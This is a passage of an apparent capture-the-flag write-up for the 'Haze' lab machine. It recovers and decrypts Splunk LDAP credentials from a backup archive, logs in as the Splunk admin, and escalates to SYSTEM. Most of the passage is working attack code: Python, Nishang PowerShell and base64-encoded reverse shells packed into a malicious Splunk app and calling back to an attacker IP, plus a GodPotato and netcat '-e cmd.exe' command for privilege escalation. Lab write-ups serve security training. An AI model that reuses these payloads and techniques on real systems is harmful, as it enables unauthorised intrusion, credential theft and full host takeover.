d-----          5/8/2021   2:40 AM                Program Files (x86)
d-r---         3/31/2025   8:11 AM                Users
d-----         3/25/2025   2:15 PM                Windows


*Evil-WinRM* PS C:\Users\mark.adams\Documents> dir C:\Backups
Access to the path 'C:\Backups' is denied.
At line:1 char:1
+ dir C:\Backups
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Backups:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

However, edward.martin is part of Backup_Reviewers group:

*Evil-WinRM* PS C:\Users\edward.martin\Documents> net user edward.martin

User name                    edward.martin
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            3/31/2025 9:17:28 AM
Password expires             Never
Password changeable          4/1/2025 9:17:28 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   3/31/2025 9:12:11 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Backup_Reviewers     *Domain Users
The command completed successfully.

and this user can list C:\Backups directory:

*Evil-WinRM* PS C:\Users\edward.martin\Documents> dir C:\Backups


    Directory: C:\Backups


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          3/5/2025  12:33 AM                Splunk

As we discovered and confirm with icacls, Backup_Reviewers group can read this directory:

*Evil-WinRM* PS C:\Users\edward.martin\Documents> icacls C:\Backups

C:\Backups HAZE\Backup_Reviewers:(OI)(CI)(RX)
           CREATOR OWNER:(OI)(CI)(IO)(F)
           NT AUTHORITY\SYSTEM:(OI)(CI)(F)
           BUILTIN\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files

At C:\Backups\Splunk folder, we have a .zip file which seems to be a backup:

*Evil-WinRM* PS C:\Users\edward.martin\Documents> dir C:\Backups\Splunk


    Directory: C:\Backups\Splunk


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          8/6/2024   3:22 PM       27445566 splunk_backup_2024-08-06.zip

Download it into our attacker machine using download function from evil-winrm (go for a coffee, it takes some time):

*Evil-WinRM* PS C:\Users\edward.martin\Documents> cd C:\Backups\Splunk

*Evil-WinRM* PS C:\Backups\Splunk> download splunk_backup_2024-08-06.zip

Info: Downloading C:\Backups\Splunk\splunk_backup_2024-08-06.zip to splunk_backup_2024-08-06.zip

Info: Download successful!

Then, unzip this file in our attacker machine:

❯ unzip splunk_backup_2024-08-06.zip

Archive:  splunk_backup_2024-08-06.zip
   creating: Splunk/
   creating: Splunk/bin/
<SNIP>

It extracts all its content into a directory called Splunk. If we remember, authentication.conf had the credentials for the first user we met. Let’s check this file in this backup:

❯ find ./Splunk -name '*authentication.conf' -type f 2>/dev/null

./Splunk/var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf
./Splunk/var/run/splunk/confsnapshot/baseline_default/system/default/authentication.conf
./Splunk/etc/system/default/authentication.conf

The first file in the list shows something similar as we discovered initially:

❯ cat ./Splunk/var/run/splunk/confsnapshot/baseline_local/system/local/authentication.conf

[default]

minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0


[Haze LDAP Auth]

SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=alexander.green,CN=Users,DC=haze,DC=htb
bindDNpassword = $1$YDz8WfhoCWmf6aTRkA+QqUI=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_Admins,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP%

It’s a new encrypted password for alexander.green user (which we can confirm with Bloodhound that exists in the domain).

Similar as we decrypted the password for paul.taylor with splunksecrets, decrypt this password. But first we need the splunk.secret as well:

❯ find ./Splunk -name '*splunk.secret' -type f 2>/dev/null

./Splunk/etc/auth/splunk.secret

Use the secret in this file to decrypt the password:

❯ splunksecrets splunk-legacy-decrypt -S ./Splunk/etc/auth/splunk.secret --ciphertext '$1$YDz8WfhoCWmf6aTRkA+QqUI='

Sp1unkadmin@2k24

We got a new password: Sp1unkadmin@2k24.

We can go back to Splunk panel running at http://haze.htb:8000 in a web browser and try with credentials admin:Sp1unkadmin@2k24. They work. We are in:

Haze 6

We can try to load a malicious module to send us a reverse shell. For this purpose, we could use files at this repository. First, we need to clone it and edit files at reverse_shell_splunk/bin directory. Change reverse_shell_splunk/bin/rev.py from:

import sys,socket,os,pty

ip="attacker-ip-here"  
port="attacker port here"  
s=socket.socket()  
s.connect((ip,int(port)))  
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')  

to:

import sys,socket,os,pty

ip="10.10.16.56" # we have added our attacker IP
port="443" # we have added our listening port
s=socket.socket()  
s.connect((ip,int(port)))  
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')  

Where 10.10.16.56 is our attacker IP and 443 the port we will start listening with netcat.

Also, change the file reverse_shell_splunk/bin/run.ps1 (which is just the oneliner file from Nishang)

#A simple and small reverse shell. Options and help removed to save space. 
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
$client = New-Object System.Net.Sockets.TCPClient('attacker_ip_here',attacker_port_here);$stream = $client.GetStream();[byte[`$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

to:

$client = New-Object System.Net.Sockets.TCPClient('10.10.16.56',443);$stream = $client.GetStream();[byte[`$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Where we have added our attacker IP address and listening port as well.

Finally, also change reverse_shell_splunk/bin/run.bat to:

@ECHO OFF
PowerShell.exe -exec bypass -w hidden -Command "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANQA2ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
Exit

where we have passed a PowerShell #3 (Base64) payload from https://www.revshells.com/.

Note
We change these three files since we don’t exactly know which one will be executed. Probably Python script don’t be executed, whereas .bat and .ps1 files probably might be executed since the target is a Windows machine. If we don’t know which one is, I recommend to edit those three files as we have just done.

Once done, follow the steps from the repository and compress the file using tar:

❯ tar -cvzf reverse_shell_splunk.tgz reverse_shell_splunk

reverse_shell_splunk/
reverse_shell_splunk/bin/
reverse_shell_splunk/bin/run.ps1
reverse_shell_splunk/bin/rev.py
reverse_shell_splunk/bin/run.bat
reverse_shell_splunk/default/
reverse_shell_splunk/default/inputs.conf

and rename this file changing its extension from .tgz to .spl:

❯ mv reverse_shell_splunk.tgz reverse_shell_splunk.spl

Then, at Splunk panel click on Manage at the top-left side:

Haze 7

Click on Install app from file at the top-right side:

Haze 8

Start a listener with netcat (along with rlwrap) in our attacker machine on port 443 and, back to the Splunk page, click on Browse and select our reverse_shell_splunk.spl file. We get a shell as alexander.green user:

❯ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.56] from (UNKNOWN) [10.129.234.37] 58662
whoami

haze\alexander.green

This user has SeImpersonatePrivilege privilege enabled:

PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

We can use this privilege to escalate privileges.

We can upload a netcat binary for Windows and a tool to abuse SeImpersonatePrivilege such as GodPotato (which can be downloaded from its Github repository). For this, we use our previous session with edward.martin and upload those files to the victim machine. In my case, I like to upload them to any of the directories at UltimateAppLockerByPassList. Before uploading netcat and GodPotato, this last tool has different binaries for different Microsoft .NET versions. We can check which Microsoft .NET version has the victim machine checking its registries:

*Evil-WinRM* PS C:\Users\edward.martin\Documents> reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\CDF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4.0

We get v4.0 for Microsoft .NET. Therefore, we can download this pre-compiled GodPotato binary for that version.

Once downloaded in our attacker machine, upload netcat binary and GodPotato executable using edward.martin session with evil-winrm functions:

**Evil-WinRM* PS C:\Users\edward.martin\Documents> upload nc64.exe C:\\Windows\\System32\\spool\\drivers\\color\\nc64.exe

<SNIP>

*Evil-WinRM* PS C:\Users\edward.martin\Documents> upload GodPotato-NET4.exe C:\\Windows\\System32\\spool\\drivers\\color\\GodPotato.exe

<SNIP>

*Evil-WinRM* PS C:\Users\edward.martin\Documents> dir C:\Windows\System32\spool\drivers\color


    Directory: C:\Windows\System32\spool\drivers\color


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          5/8/2021   1:14 AM           1058 D50.camp
-a----          5/8/2021   1:14 AM           1079 D65.camp
-a----         3/31/2025  10:19 PM          57344 GodPotato.exe
-a----          5/8/2021   1:14 AM            797 Graphics.gmmp
-a----          5/8/2021   1:14 AM            838 MediaSim.gmmp
-a----         3/31/2025  10:19 PM          45272 nc64.exe
<SNIP>

Finally, at alexander.green session, abuse SeImpersonatePrivilege with the uploaded GodPotato binary. Use it to execute a command with CMD as nt authority/system, which in this case will be to execute the uploaded netcat binary to send us a reverse shell as this privileged user. Start a listener with netcat on port 443 in another terminal. Finally, as alexander.green user we execute:

PS C:\Windows\system32> C:\Windows\System32\spool\drivers\color\GodPotato.exe -cmd "C:\Windows\System32\cmd.exe /c C:\Windows\System32\spool\drivers\color\nc64.exe 10.10.16.56 443 -e cmd.exe"

We get a shell as nt authority/system user and we can grab the flag:

❯ rlwrap nc -lvnp 443

listening on [any] 443 ...
connect to [10.10.16.56] from (UNKNOWN) [10.129.104.62] 55728
Microsoft Windows [Version 10.0.20348.3328]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt

type C:\Users\Administrator\Desktop\root.txt
2a052**************************

~Happy Hacking.